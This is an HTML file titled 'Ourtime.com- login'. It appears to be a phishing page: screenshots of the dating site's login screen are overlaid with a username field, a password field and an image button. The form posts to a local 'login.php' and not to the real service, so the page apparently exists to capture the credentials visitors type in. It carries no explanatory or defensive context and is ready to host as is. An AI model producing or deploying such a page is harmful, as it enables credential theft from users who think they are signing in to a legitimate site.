<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Ourtime.com- login</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1344px; height:653px; z-index:0"><img src="images/paste196.jpg" alt="" title="" border=0 width=1344 height=653></div>

<div id="image2" style="position:absolute; overflow:hidden; left:1237px; top:566px; width:109px; height:81px; z-index:1"><img src="images/paste197.jpg" alt="" title="" border=0 width=109 height=81></div>

<form name="form1" method="POST" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:205px;left:231px;top:163px;z-index:3;height: 28px;">
<input name="formtext2" type="password" style="position:absolute;width:205px;left:231px;top:209px;z-index:4;height: 29px;">
<div id="formimage1" style="position:absolute; left:225px; top:286px; z-index:5"><input type="image" name="formimage1" width="76" height="44" src="images/l.PNG"></div>
</form>


</body>
</html>
